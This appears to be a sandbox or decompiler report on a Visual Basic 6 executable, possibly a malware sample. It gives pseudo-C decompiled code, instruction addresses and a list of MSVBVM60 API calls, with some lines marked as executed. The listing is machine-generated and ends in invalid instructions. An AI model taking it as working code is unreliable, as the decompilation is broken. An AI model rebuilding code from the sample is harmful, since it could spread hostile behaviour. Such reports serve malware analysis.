				_v104 = _v104 & 0x00000000;
				_v132 = _v284;
				_v140 = 9;
				_v208 = 0x33b88b;
				_t680 =  &_v124;
				L004012AE();
				_v204 = _t680;
				_v220 = 0xc70ba0d0;
				_v216 = 0x5af7;
				_v200 = _v196;
				L004011D0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L004011D0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v284 =  *0x401150;
				_v292 =  *0x401148;
				 *((intOrPtr*)( *_a4 + 0x70c))(_a4,  &_v200,  &_v220, 0xd5a16240, 0x5af9,  &_v204, _t900,  &_v208, _t900, _t900, 0x10, 0x10, _v192,  &_v212, _t680);
				_v64 = _v212;
				_push( &_v96);
				_push( &_v108);
				_push( &_v100);
				_push( &_v92);
				_push( &_v88);
				_push(5);
				L004012BA();
				_push( &_v140);
				_push( &_v124);
				_push(2);
				L0040130E();
				if( *0x412010 != 0) {
					_v360 = 0x412010;
				} else {
					_push(0x412010);
					_push(0x40e9a0);
					L004012C6();
					_v360 = 0x412010;
				}
				_t903 =  *((intOrPtr*)( *_v360));
				_t702 =  &_v88;
				L004012CC();
				_v232 = _t702;
				_t706 =  *((intOrPtr*)( *_v232 + 0x170))(_v232,  &_v72, _t702,  *((intOrPtr*)(_t903 + 0x2fc))( *_v360));
				asm("fclex");
				_v236 = _t706;
				if(_v236 >= 0) {
					_v364 = _v364 & 0x00000000;
				} else {
					_push(0x170);
					_push(0x40e6c4);
					_push(_v232);
					_push(_v236);
					L004012C0();
					_v364 = _t706;
				}
				_v220 =  *0x401140;
				_v288 = _v72;
				_v72 = _v72 & 0x00000000;
				_v116 = _v288;
				_v124 = 8;
				_v360 =  *0x401138;
				_t714 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4,  &_v124, _t903, _t903,  &_v220, 0x5c48bed0, 0x5b07,  &_v196);
				_v240 = _t714;
				if(_v240 >= 0) {
					_v368 = _v368 & 0x00000000;
				} else {
					_push(0x6fc);
					_push(0x40e54c);
					_push(_a4);
					_push(_v240);
					L004012C0();
					_v368 = _t714;
				}
				_v60 = _v196;
				L004012A8();
				L004012D8();
				if( *0x412010 != 0) {
					_v372 = 0x412010;
				} else {
					_push(0x412010);
					_push(0x40e9a0);
					L004012C6();
					_v372 = 0x412010;
				}
				_t719 =  &_v88;
				L004012CC();
				_v232 = _t719;
				_t723 =  *((intOrPtr*)( *_v232 + 0x160))(_v232,  &_v92, _t719,  *((intOrPtr*)( *((intOrPtr*)( *_v372)) + 0x2fc))( *_v372));
				asm("fclex");
				_v236 = _t723;
				if(_v236 >= 0) {
					_v376 = _v376 & 0x00000000;
				} else {
					_push(0x160);
					_push(0x40e6c4);
					_push(_v232);
					_push(_v236);
					L004012C0();
					_v376 = _t723;
				}
				_push(0);
				_push(0);
				_push(_v92);
				_push( &_v124);
				L004012B4();
				if( *0x412010 != 0) {
					_v380 = 0x412010;
				} else {
					_push(0x412010);
					_push(0x40e9a0);
					L004012C6();
					_v380 = 0x412010;
				}
				_t728 =  &_v96;
				L004012CC();
				_v240 = _t728;
				_t732 =  *((intOrPtr*)( *_v240 + 0x120))(_v240,  &_v196, _t728,  *((intOrPtr*)( *((intOrPtr*)( *_v380)) + 0x30c))( *_v380));
				asm("fclex");
				_v244 = _t732;
				if(_v244 >= 0) {
					_v384 = _v384 & 0x00000000;
				} else {
					_push(0x120);
					_push(0x40e6c4);
					_push(_v240);
					_push(_v244);
					L004012C0();
					_v384 = _t732;
				}
				if( *0x412010 != 0) {
					_v388 = 0x412010;
				} else {
					_push(0x412010);
					_push(0x40e9a0);
					L004012C6();
					_v388 = 0x412010;
				}
				_t736 =  &_v100;
				L004012CC();
				_v248 = _t736;
				_t740 =  *((intOrPtr*)( *_v248 + 0x70))(_v248,  &_v200, _t736,  *((intOrPtr*)( *((intOrPtr*)( *_v388)) + 0x318))( *_v388));
				asm("fclex");
				_v252 = _t740;
				if(_v252 >= 0) {
					_v392 = _v392 & 0x00000000;
				} else {
					_push(0x70);
					_push(0x40e6f8);
					_push(_v248);
					_push(_v252);
					L004012C0();
					_v392 = _t740;
				}
				_t915 =  &_v72;
				L004012A2();
				_v192 = 0x1bd4;
				_v180 = _v196;
				_v188 = 3;
				_v228 =  *0x401130;
				_v220 = 0x91e41cd0;
				_v216 = 0x5b05;
				_v432 =  *0x40112c;
				_v440 = _v200;
				L004011D0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t746 =  &_v124;
				L004012AE();
				 *((intOrPtr*)( *_a4 + 0x710))(_a4,  &_v220, _t746, _t746,  &_v228, 0x10,  &_v192, _t915,  &_v72, _t915);
				L00401314();
				_push( &_v92);
				_push( &_v100);
				_push( &_v96);
				_push( &_v88);
				_push(4);
				L004012BA();
				L004012D8();
				if( *0x412010 != 0) {
					_v396 = 0x412010;
				} else {
					_push(0x412010);
					_push(0x40e9a0);
					L004012C6();
					_v396 = 0x412010;
				}
				_t758 =  &_v88;
				L004012CC();
				_v232 = _t758;
				_t762 =  *((intOrPtr*)( *_v232 + 0x198))(_v232,  &_v72, _t758,  *((intOrPtr*)( *((intOrPtr*)( *_v396)) + 0x304))( *_v396));
				asm("fclex");
				_v236 = _t762;
				if(_v236 >= 0) {
					_v400 = _v400 & 0x00000000;
				} else {
					_push(0x198);
					_push(0x40e6b4);
					_push(_v232);
					_push(_v236);
					L004012C0();
					_v400 = _t762;
				}
				if( *0x412010 != 0) {
					_v404 = 0x412010;
				} else {
					_push(0x412010);
					_push(0x40e9a0);
					L004012C6();
					_v404 = 0x412010;
				}
				_t766 =  &_v92;
				L004012CC();
				_v240 = _t766;
				_t770 =  *((intOrPtr*)( *_v240 + 0x160))(_v240,  &_v96, _t766,  *((intOrPtr*)( *((intOrPtr*)( *_v404)) + 0x300))( *_v404));
				asm("fclex");
				_v244 = _t770;
				if(_v244 >= 0) {
					_v408 = _v408 & 0x00000000;
				} else {
					_push(0x160);
					_push(0x40e6c4);
					_push(_v240);
					_push(_v244);
					L004012C0();
					_v408 = _t770;
				}
				if( *0x412010 != 0) {
					_v412 = 0x412010;
				} else {
					_push(0x412010);
					_push(0x40e9a0);
					L004012C6();
					_v412 = 0x412010;
				}
				_t774 =  &_v100;
				L004012CC();
				_v248 = _t774;
				_t778 =  *((intOrPtr*)( *_v248 + 0x1c0))(_v248,  &_v196, _t774,  *((intOrPtr*)( *((intOrPtr*)( *_v412)) + 0x304))( *_v412));
				asm("fclex");
				_v252 = _t778;
				if(_v252 >= 0) {
					_v416 = _v416 & 0x00000000;
				} else {
					_push(0x1c0);
					_push(0x40e6b4);
					_push(_v248);
					_push(_v252);
					L004012C0();
					_v416 = _t778;
				}
				_v180 = 0x7264c0;
				_v188 = 3;
				_v292 = _v96;
				_v96 = _v96 & 0x00000000;
				_v116 = _v292;
				_v124 = 9;
				_v220 = 0x4c1ab180;
				_v216 = 0x5b02;
				L004012A2();
				L004011D0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t787 =  *((intOrPtr*)( *_a4 + 0x700))(_a4,  &_v76, _v72,  &_v220,  &_v124, 0x10, _v196);
				_v256 = _t787;
				if(_v256 >= 0) {
					_v420 = _v420 & 0x00000000;
				} else {
					_push(0x700);
					_push(0x40e54c);
					_push(_a4);
					_push(_v256);
					L004012C0();
					_v420 = _t787;
				}
				_push( &_v72);
				_push( &_v76);
				_push(2);
				L0040129C();
				_push( &_v100);
				_push( &_v92);
				_push( &_v88);
				_push(3);
				L004012BA();
				L004012D8();
				if( *0x412010 != 0) {
					_v424 = 0x412010;
				} else {
					_push(0x412010);
					_push(0x40e9a0);
					L004012C6();
					_v424 = 0x412010;
				}
				_t796 =  &_v88;
				L004012CC();
				_v232 = _t796;
				_t800 =  *((intOrPtr*)( *_v232 + 0x1dc))(_v232,  &_v72, _t796,  *((intOrPtr*)( *((intOrPtr*)( *_v424)) + 0x314))( *_v424));
				asm("fclex");
				_v236 = _t800;
				if(_v236 >= 0) {
					_v428 = _v428 & 0x00000000;
				} else {
					_push(0x1dc);
					_push(0x40e6f8);
					_push(_v232);
					_push(_v236);
					L004012C0();
					_v428 = _t800;
				}
				if( *0x412010 != 0) {
					_v432 = 0x412010;
				} else {
					_push(0x412010);
					_push(0x40e9a0);
					L004012C6();
					_v432 = 0x412010;
				}
				_t804 =  &_v92;
				L004012CC();
				_v240 = _t804;
				_t808 =  *((intOrPtr*)( *_v240 + 0x130))(_v240,  &_v96, _t804,  *((intOrPtr*)( *((intOrPtr*)( *_v432)) + 0x300))( *_v432));
				asm("fclex");
				_v244 = _t808;
				if(_v244 >= 0) {
					_v436 = _v436 & 0x00000000;
				} else {
					_push(0x130);
					_push(0x40e6c4);
					_push(_v240);
					_push(_v244);
					L004012C0();
					_v436 = _t808;
				}
				_push(0);
				_push(0);
				_push(_v96);
				_push( &_v140); // executed
				L004012B4(); // executed
				if( *0x412010 != 0) {
					_v440 = 0x412010;
				} else {
					_push(0x412010);
					_push(0x40e9a0);
					L004012C6();
					_v440 = 0x412010;
				}
				_t813 =  &_v100;
				L004012CC();
				_v248 = _t813;
				_t817 =  *((intOrPtr*)( *_v248 + 0x198))(_v248,  &_v76, _t813,  *((intOrPtr*)( *((intOrPtr*)( *_v440)) + 0x310))( *_v440));
				asm("fclex");
				_v252 = _t817;
				if(_v252 >= 0) {
					_v444 = _v444 & 0x00000000;
				} else {
					_push(0x198);
					_push(0x40e6f8);
					_push(_v248);
					_push(_v252);
					L004012C0();
					_v444 = _t817;
				}
				if( *0x412010 != 0) {
					_v448 = 0x412010;
				} else {
					_push(0x412010);
					_push(0x40e9a0);
					L004012C6();
					_v448 = 0x412010;
				}
				_t821 =  &_v104;
				L004012CC();
				_v256 = _t821;
				_t825 =  *((intOrPtr*)( *_v256 + 0xf8))(_v256,  &_v80, _t821,  *((intOrPtr*)( *((intOrPtr*)( *_v448)) + 0x314))( *_v448));
				asm("fclex");
				_v260 = _t825;
				if(_v260 >= 0) {
					_v452 = _v452 & 0x00000000;
				} else {
					_push(0xf8);
					_push(0x40e6f8);
					_push(_v256);
					_push(_v260);
					L004012C0();
					_v452 = _t825;
				}
				_v296 = _v80;
				_v80 = _v80 & 0x00000000;
				_v164 = _v296;
				_v172 = 8;
				_v192 = 0x375e;
				_v300 = _v76;
				_v76 = _v76 & 0x00000000;
				_v148 = _v300;
				_v156 = 8;
				_v304 = _v72;
				_v72 = _v72 & 0x00000000;
				_v116 = _v304;
				_v124 = 8;
				_v228 = 0x16c751a0;
				_v224 = 0x5b07;
				_v220 = 0x62c32930;
				_v216 = 0x5af3;
				L004011D0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t835 =  &_v140;
				L00401296();
				L00401320();
				 *((intOrPtr*)( *_a4 + 0x714))(_a4,  &_v220,  &_v228,  &_v124, _t835, _t835,  &_v156, 0x2c9400,  &_v192, 0x10);
				_t942 =  &_v84;
				L00401314();
				L004012BA();
				L0040130E();
				_t853 =  *((intOrPtr*)( *_a4 + 0x2b4))(_a4, 4,  &_v124,  &_v140,  &_v156,  &_v172, 5,  &_v88,  &_v92,  &_v100,  &_v104,  &_v96);
				asm("fclex");
				_v232 = _t853;
				if(_v232 >= 0) {
					_v456 = _v456 & 0x00000000;
				} else {
					_push(0x2b4);
					_push(0x40e51c);
					_push(_a4);
					_push(_v232);
					L004012C0();
					_v456 = _t853;
				}
				_push(1);
				L00401290();
				_push(4);
				_push(0xffffffff);
				 *((intOrPtr*)(( *0x00401F24() & 0x00000041) + 0x70)) =  *((intOrPtr*)(( *0x00401F24() & 0x00000041) + 0x70)) + _t942;
				asm("out 0x40, eax");
				asm("invalid");
				goto _v611;
			}


























































































































































                        0x0040f286
                        0x0040f292
                        0x0040f29a
                        0x0040f29d
                        0x0040f2aa
                        0x0040f2b3
                        0x0040f2b6
                        0x0040f2c5
                        0x0040f2c8
                        0x0040f2cf
                        0x0040f2d6
                        0x0040f2d8
                        0x0040f2da
                        0x0040f2dd
                        0x0040f2de
                        0x0040f2e3
                        0x0040f2e8
                        0x0040f2f2
                        0x0040f2f7
                        0x0040f2fe
                        0x0040f2ff
                        0x0040f304
                        0x0040f30a
                        0x0040f30b
                        0x0040f310
                        0x0040f315
                        0x0040f321
                        0x0040f325
                        0x0040f326
                        0x0040f32e
                        0x0040f339
                        0x0040f33a
                        0x0040f33d
                        0x0040f33e
                        0x0040f340
                        0x0040f345
                        0x0040f348
                        0x0040f34a
                        0x0040f34d
                        0x0040f352
                        0x0040f354
                        0x0040f359
                        0x0040f360
                        0x0040f369
                        0x0040f36a
                        0x0040f372
                        0x0040f373
                        0x0040f376
                        0x0040f377
                        0x0040f37c
                        0x0040f383
                        0x0040f384
                        0x0040f38f
                        0x0040f390
                        0x0040f39b
                        0x0040f39c
                        0x0040f3a2
                        0x0040f3a3
                        0x0040f3a8
                        0x0040f3b2
                        0x0040f3bd
                        0x0040f3c4
                        0x0040f3c8
                        0x0040f3c9
                        0x0040f3cb
                        0x0040f3d0
                        0x0040f3dc
                        0x0040f3e1
                        0x0040f3e7
                        0x0040f3fa
                        0x0040f3ff
                        0x0040f402
                        0x0040f403
                        0x0040f40f
                        0x0040f414
                        0x0040f41e
                        0x0040f42c
                        0x0040f42e
                        0x0040f432
                        0x0040f439
                        0x0040f43b
                        0x0040f43d
                        0x0040f43f
                        0x0040f444
                        0x0040f445
                        0x0040f44f
                        0x0040f457
                        0x0040f457
                        0x0040f42c
                        0x0040f3dc
                        0x0040f463
                        0x0040f480
                        0x0040f465
                        0x0040f465
                        0x0040f46a
                        0x0040f46f
                        0x0040f474
                        0x0040f474
                        0x0040f4a4
                        0x0040f4a8
                        0x0040f4ad
                        0x0040f4c5
                        0x0040f4cb
                        0x0040f4cd
                        0x0040f4da
                        0x0040f4ff
                        0x0040f4dc
                        0x0040f4dc
                        0x0040f4e1
                        0x0040f4e6
                        0x0040f4ec
                        0x0040f4f2
                        0x0040f4f7
                        0x0040f4f7
                        0x0040f50d
                        0x0040f52a
                        0x0040f50f
                        0x0040f50f
                        0x0040f514
                        0x0040f519
                        0x0040f51e
                        0x0040f51e
                        0x0040f54e
                        0x0040f552
                        0x0040f557
                        0x0040f572
                        0x0040f578
                        0x0040f57a
                        0x0040f587
                        0x0040f5ac
                        0x0040f589
                        0x0040f589
                        0x0040f58e
                        0x0040f593
                        0x0040f599
                        0x0040f59f
                        0x0040f5a4
                        0x0040f5a4
                        0x0040f5b9
                        0x0040f5bf
                        0x0040f5c9
                        0x0040f5d6
                        0x0040f5dc
                        0x0040f5e6
                        0x0040f5e9
                        0x0040f5f0
                        0x0040f5fa
                        0x0040f61c
                        0x0040f626
                        0x0040f627
                        0x0040f628
                        0x0040f629
                        0x0040f640
                        0x0040f64c
                        0x0040f659
                        0x0040f664
                        0x0040f66f
                        0x0040f675
                        0x0040f67f
                        0x0040f69a
                        0x0040f6a7
                        0x0040f6a8
                        0x0040f6a9
                        0x0040f6aa
                        0x0040f6b3
                        0x0040f6b9
                        0x0040f6c6
                        0x0040f6e8
                        0x0040f6c8
                        0x0040f6c8
                        0x0040f6cd
                        0x0040f6d2
                        0x0040f6d5
                        0x0040f6db
                        0x0040f6e0
                        0x0040f6e0
                        0x0040f6f5
                        0x0040f6fe
                        0x0040f708
                        0x0040f725
                        0x0040f70a
                        0x0040f70a
                        0x0040f70f
                        0x0040f714
                        0x0040f719
                        0x0040f719
                        0x0040f749
                        0x0040f74d
                        0x0040f752
                        0x0040f76d
                        0x0040f770
                        0x0040f772
                        0x0040f77f
                        0x0040f7a1
                        0x0040f781
                        0x0040f781
                        0x0040f783
                        0x0040f788
                        0x0040f78e
                        0x0040f794
                        0x0040f799
                        0x0040f799
                        0x0040f7af
                        0x0040f7cc
                        0x0040f7b1
                        0x0040f7b1
                        0x0040f7b6
                        0x0040f7bb
                        0x0040f7c0
                        0x0040f7c0
                        0x0040f7f0
                        0x0040f7f4
                        0x0040f7f9
                        0x0040f811
                        0x0040f817
                        0x0040f819
                        0x0040f826
                        0x0040f84b
                        0x0040f828
                        0x0040f828
                        0x0040f82d
                        0x0040f832
                        0x0040f838
                        0x0040f83e
                        0x0040f843
                        0x0040f843
                        0x0040f852
                        0x0040f854
                        0x0040f856
                        0x0040f85c
                        0x0040f85d
                        0x0040f86c
                        0x0040f889
                        0x0040f86e
                        0x0040f86e
                        0x0040f873
                        0x0040f878
                        0x0040f87d
                        0x0040f87d
                        0x0040f8ad
                        0x0040f8b1
                        0x0040f8b6
                        0x0040f8ce
                        0x0040f8d1
                        0x0040f8d3
                        0x0040f8e0
                        0x0040f902
                        0x0040f8e2
                        0x0040f8e2
                        0x0040f8e4
                        0x0040f8e9
                        0x0040f8ef
                        0x0040f8f5
                        0x0040f8fa
                        0x0040f8fa
                        0x0040f910
                        0x0040f92d
                        0x0040f912
                        0x0040f912
                        0x0040f917
                        0x0040f91c
                        0x0040f921
                        0x0040f921
                        0x0040f947
                        0x0040f951
                        0x0040f955
                        0x0040f95a
                        0x0040f975
                        0x0040f97b
                        0x0040f97d
                        0x0040f98a
                        0x0040f9af
                        0x0040f98c
                        0x0040f98c
                        0x0040f991
                        0x0040f996
                        0x0040f99c
                        0x0040f9a2
                        0x0040f9a7
                        0x0040f9a7
                        0x0040f9b6
                        0x0040f9c0
                        0x0040f9cd
                        0x0040f9d3
                        0x0040f9dd
                        0x0040f9e0
                        0x0040f9ea
                        0x0040f9f4
                        0x0040f9f8
                        0x0040f9fd
                        0x0040fa03
                        0x0040fa0d
                        0x0040fa1d
                        0x0040fa33
                        0x0040fa40
                        0x0040fa41
                        0x0040fa42
                        0x0040fa43
                        0x0040fa47
                        0x0040fa54
                        0x0040fa55
                        0x0040fa56
                        0x0040fa57
                        0x0040fa60
                        0x0040fa71
                        0x0040fa9b
                        0x0040faa7
                        0x0040faad
                        0x0040fab1
                        0x0040fab5
                        0x0040fab9
                        0x0040fabd
                        0x0040fabe
                        0x0040fac0
                        0x0040face
                        0x0040fad2
                        0x0040fad3
                        0x0040fad5
                        0x0040fae4
                        0x0040fb01
                        0x0040fae6
                        0x0040fae6
                        0x0040faeb
                        0x0040faf0
                        0x0040faf5
                        0x0040faf5
                        0x0040fb1b
                        0x0040fb25
                        0x0040fb29
                        0x0040fb2e
                        0x0040fb46
                        0x0040fb4c
                        0x0040fb4e
                        0x0040fb5b
                        0x0040fb80
                        0x0040fb5d
                        0x0040fb5d
                        0x0040fb62
                        0x0040fb67
                        0x0040fb6d
                        0x0040fb73
                        0x0040fb78
                        0x0040fb78
                        0x0040fb8d
                        0x0040fb96
                        0x0040fb9c
                        0x0040fba6
                        0x0040fba9
                        0x0040fbd0
                        0x0040fbdf
                        0x0040fbe5
                        0x0040fbf2
                        0x0040fc14
                        0x0040fbf4
                        0x0040fbf4
                        0x0040fbf9
                        0x0040fbfe
                        0x0040fc01
                        0x0040fc07
                        0x0040fc0c
                        0x0040fc0c
                        0x0040fc21
                        0x0040fc27
                        0x0040fc2f
                        0x0040fc3b
                        0x0040fc58
                        0x0040fc3d
                        0x0040fc3d
                        0x0040fc42
                        0x0040fc47
                        0x0040fc4c
                        0x0040fc4c
                        0x0040fc7c
                        0x0040fc80
                        0x0040fc85
                        0x0040fc9d
                        0x0040fca3
                        0x0040fca5
                        0x0040fcb2
                        0x0040fcd7
                        0x0040fcb4
                        0x0040fcb4
                        0x0040fcb9
                        0x0040fcbe
                        0x0040fcc4
                        0x0040fcca
                        0x0040fccf
                        0x0040fccf
                        0x0040fcde
                        0x0040fce0
                        0x0040fce2
                        0x0040fce8
                        0x0040fce9
                        0x0040fcf8
                        0x0040fd15
                        0x0040fcfa
                        0x0040fcfa
                        0x0040fcff
                        0x0040fd04
                        0x0040fd09
                        0x0040fd09
                        0x0040fd39
                        0x0040fd3d
                        0x0040fd42
                        0x0040fd5d
                        0x0040fd63
                        0x0040fd65
                        0x0040fd72
                        0x0040fd97
                        0x0040fd74
                        0x0040fd74
                        0x0040fd79
                        0x0040fd7e
                        0x0040fd84
                        0x0040fd8a
                        0x0040fd8f
                        0x0040fd8f
                        0x0040fda5
                        0x0040fdc2
                        0x0040fda7
                        0x0040fda7
                        0x0040fdac
                        0x0040fdb1
                        0x0040fdb6
                        0x0040fdb6
                        0x0040fde6
                        0x0040fdea
                        0x0040fdef
                        0x0040fe0a
                        0x0040fe0d
                        0x0040fe0f
                        0x0040fe1c
                        0x0040fe3e
                        0x0040fe1e
                        0x0040fe1e
                        0x0040fe20
                        0x0040fe25
                        0x0040fe2b
                        0x0040fe31
                        0x0040fe36
                        0x0040fe36
                        0x0040fe4a
                        0x0040fe4d
                        0x0040fe52
                        0x0040fe61
                        0x0040fe67
                        0x0040fe77
                        0x0040fe7d
                        0x0040fe87
                        0x0040fe98
                        0x0040fea6
                        0x0040feb3
                        0x0040fec0
                        0x0040fec1
                        0x0040fec2
                        0x0040fec3
                        0x0040fecb
                        0x0040fecf
                        0x0040fee4
                        0x0040feed
                        0x0040fef5
                        0x0040fef9
                        0x0040fefd
                        0x0040ff01
                        0x0040ff02
                        0x0040ff04
                        0x0040ff0f
                        0x0040ff1b
                        0x0040ff38
                        0x0040ff1d
                        0x0040ff1d
                        0x0040ff22
                        0x0040ff27
                        0x0040ff2c
                        0x0040ff2c
                        0x0040ff5c
                        0x0040ff60
                        0x0040ff65
                        0x0040ff7d
                        0x0040ff83
                        0x0040ff85
                        0x0040ff92
                        0x0040ffb7
                        0x0040ff94
                        0x0040ff94
                        0x0040ff99
                        0x0040ff9e
                        0x0040ffa4
                        0x0040ffaa
                        0x0040ffaf
                        0x0040ffaf
                        0x0040ffc5
                        0x0040ffe2
                        0x0040ffc7
                        0x0040ffc7
                        0x0040ffcc
                        0x0040ffd1
                        0x0040ffd6
                        0x0040ffd6
                        0x00410006
                        0x0041000a
                        0x0041000f
                        0x00410027
                        0x0041002d
                        0x0041002f
                        0x0041003c
                        0x00410061
                        0x0041003e
                        0x0041003e
                        0x00410043
                        0x00410048
                        0x0041004e
                        0x00410054
                        0x00410059
                        0x00410059
                        0x0041006f
                        0x0041008c
                        0x00410071
                        0x00410071
                        0x00410076
                        0x0041007b
                        0x00410080
                        0x00410080
                        0x004100b0
                        0x004100b4
                        0x004100b9
                        0x004100d4
                        0x004100da
                        0x004100dc
                        0x004100e9
                        0x0041010e
                        0x004100eb
                        0x004100eb
                        0x004100f0
                        0x004100f5
                        0x004100fb
                        0x00410101
                        0x00410106
                        0x00410106
                        0x00410115
                        0x0041011f
                        0x0041012c
                        0x00410132
                        0x0041013c
                        0x0041013f
                        0x00410146
                        0x00410150
                        0x00410162
                        0x00410170
                        0x0041017d
                        0x0041017e
                        0x0041017f
                        0x00410180
                        0x0041019b
                        0x004101a1
                        0x004101ae
                        0x004101d0
                        0x004101b0
                        0x004101b0
                        0x004101b5
                        0x004101ba
                        0x004101bd
                        0x004101c3
                        0x004101c8
                        0x004101c8
                        0x004101da
                        0x004101de
                        0x004101df
                        0x004101e1
                        0x004101ec
                        0x004101f0
                        0x004101f4
                        0x004101f5
                        0x004101f7
                        0x00410202
                        0x0041020e
                        0x0041022b
                        0x00410210
                        0x00410210
                        0x00410215
                        0x0041021a
                        0x0041021f
                        0x0041021f
                        0x0041024f
                        0x00410253
                        0x00410258
                        0x00410270
                        0x00410276
                        0x00410278
                        0x00410285
                        0x004102aa
                        0x00410287
                        0x00410287
                        0x0041028c
                        0x00410291
                        0x00410297
                        0x0041029d
                        0x004102a2
                        0x004102a2
                        0x004102b8
                        0x004102d5
                        0x004102ba
                        0x004102ba
                        0x004102bf
                        0x004102c4
                        0x004102c9
                        0x004102c9
                        0x004102f9
                        0x004102fd
                        0x00410302
                        0x0041031a
                        0x00410320
                        0x00410322
                        0x0041032f
                        0x00410354
                        0x00410331
                        0x00410331
                        0x00410336
                        0x0041033b
                        0x00410341
                        0x00410347
                        0x0041034c
                        0x0041034c
                        0x0041035b
                        0x0041035d
                        0x0041035f
                        0x00410368
                        0x00410369
                        0x00410378
                        0x00410395
                        0x0041037a
                        0x0041037a
                        0x0041037f
                        0x00410384
                        0x00410389
                        0x00410389
                        0x004103b9
                        0x004103bd
                        0x004103c2
                        0x004103da
                        0x004103e0
                        0x004103e2
                        0x004103ef
                        0x00410414
                        0x004103f1
                        0x004103f1
                        0x004103f6
                        0x004103fb
                        0x00410401
                        0x00410407
                        0x0041040c
                        0x0041040c
                        0x00410422
                        0x0041043f
                        0x00410424
                        0x00410424
                        0x00410429
                        0x0041042e
                        0x00410433
                        0x00410433
                        0x00410463
                        0x00410467
                        0x0041046c
                        0x00410484
                        0x0041048a
                        0x0041048c
                        0x00410499
                        0x004104be
                        0x0041049b
                        0x0041049b
                        0x004104a0
                        0x004104a5
                        0x004104ab
                        0x004104b1
                        0x004104b6
                        0x004104b6
                        0x004104c8
                        0x004104ce
                        0x004104d8
                        0x004104de
                        0x004104e8
                        0x004104f4
                        0x004104fa
                        0x00410504
                        0x0041050a
                        0x00410517
                        0x0041051d
                        0x00410527
                        0x0041052a
                        0x00410531
                        0x0041053b
                        0x00410545
                        0x0041054f
                        0x0041055c
                        0x00410569
                        0x0041056a
                        0x0041056b
                        0x0041056c
                        0x00410580
                        0x00410587
                        0x00410591
                        0x004105b1
                        0x004105b7
                        0x004105ba
                        0x004105d5
                        0x004105f8
                        0x00410608
                        0x0041060e
                        0x00410610
                        0x0041061d
                        0x0041063f
                        0x0041061f
                        0x0041061f
                        0x00410624
                        0x00410629
                        0x0041062c
                        0x00410632
                        0x00410637
                        0x00410637
                        0x00410646
                        0x00410648
                        0x00410652
                        0x00410654
                        0x00410661
                        0x00410664
                        0x0041066f
                        0x00410671

                        APIs
                        • __vbaChkstk.MSVBVM60(?,004011D6), ref: 0040F292
                        • __vbaStrCat.MSVBVM60(0040E6B0,0040E6A8,0000000A,000000FF,00000000), ref: 0040F2E8
                        • __vbaStrMove.MSVBVM60(0040E6B0,0040E6A8,0000000A,000000FF,00000000), ref: 0040F2F2
                        • #711.MSVBVM60(?,00000000,0040E6B0,0040E6A8,0000000A,000000FF,00000000), ref: 0040F2FF
                        • __vbaAryVar.MSVBVM60(00002008,?,?,00000000,0040E6B0,0040E6A8,0000000A,000000FF,00000000), ref: 0040F310
                        • __vbaAryCopy.MSVBVM60(?,?,00002008,?,?,00000000,0040E6B0,0040E6A8,0000000A,000000FF,00000000), ref: 0040F326
                        • __vbaFreeStr.MSVBVM60(?,?,00002008,?,?,00000000,0040E6B0,0040E6A8,0000000A,000000FF,00000000), ref: 0040F32E
                        • __vbaFreeVarList.MSVBVM60(00000002,0000000A,?,?,?,00002008,?,?,00000000,0040E6B0,0040E6A8,0000000A,000000FF,00000000), ref: 0040F340
                        • __vbaDerefAry1.MSVBVM60(?,00000000,?,?,004011D6), ref: 0040F34D
                        • __vbaStrCmp.MSVBVM60(0040E6A8,00000000,?,00000000,?,?,004011D6), ref: 0040F359
                        • #610.MSVBVM60(?,0040E6A8,00000000,?,00000000,?,?,004011D6), ref: 0040F36A
                        • __vbaStrVarVal.MSVBVM60(?,?,?,0040E6A8,00000000,?,00000000,?,?,004011D6), ref: 0040F377
                        • #540.MSVBVM60(?,00000000,?,?,?,0040E6A8,00000000,?,00000000,?,?,004011D6), ref: 0040F384
                        • #610.MSVBVM60(?,?,00000000,?,?,?,0040E6A8,00000000,?,00000000,?,?,004011D6), ref: 0040F390
                        • __vbaVarTstEq.MSVBVM60(?,?,?,?,00000000,?,?,?,0040E6A8,00000000,?,00000000,?,?,004011D6), ref: 0040F3A3
                        • __vbaFreeStr.MSVBVM60(?,?,?,?,00000000,?,?,?,0040E6A8,00000000,?,00000000,?,?,004011D6), ref: 0040F3B2
                        • __vbaFreeVarList.MSVBVM60(00000003,?,?,?,?,?,?,?,00000000,?,?,?,0040E6A8,00000000,?,00000000), ref: 0040F3CB
                        • __vbaVarDup.MSVBVM60 ref: 0040F3FA
                        • #562.MSVBVM60(?), ref: 0040F403
                        • __vbaFreeVar.MSVBVM60(?), ref: 0040F41E
                        • #704.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE,?), ref: 0040F445
                        • __vbaStrMove.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE,?), ref: 0040F44F
                        • __vbaFreeVar.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE,?), ref: 0040F457
                        • __vbaNew2.MSVBVM60(0040E9A0,00412010,0040E6A8,00000000,?,00000000,?,?,004011D6), ref: 0040F46F
                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040F4A8
                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040E6B4,000000A0), ref: 0040F4F2
                        • __vbaNew2.MSVBVM60(0040E9A0,00412010), ref: 0040F519
                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040F552
                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040E6C4,00000080), ref: 0040F59F
                        • __vbaChkstk.MSVBVM60(F09E01C0,?,?), ref: 0040F61C
                        • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0040F659
                        • __vbaFreeVar.MSVBVM60(00000000,?,00000000,?,?,004011D6), ref: 0040F664
                        • __vbaChkstk.MSVBVM60(?,?), ref: 0040F69A
                        • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040E54C,000006F8), ref: 0040F6DB
                        • __vbaNew2.MSVBVM60(0040E9A0,00412010), ref: 0040F714
                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040F74D
                        • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040E6C4,00000070), ref: 0040F794
                        • __vbaNew2.MSVBVM60(0040E9A0,00412010), ref: 0040F7BB
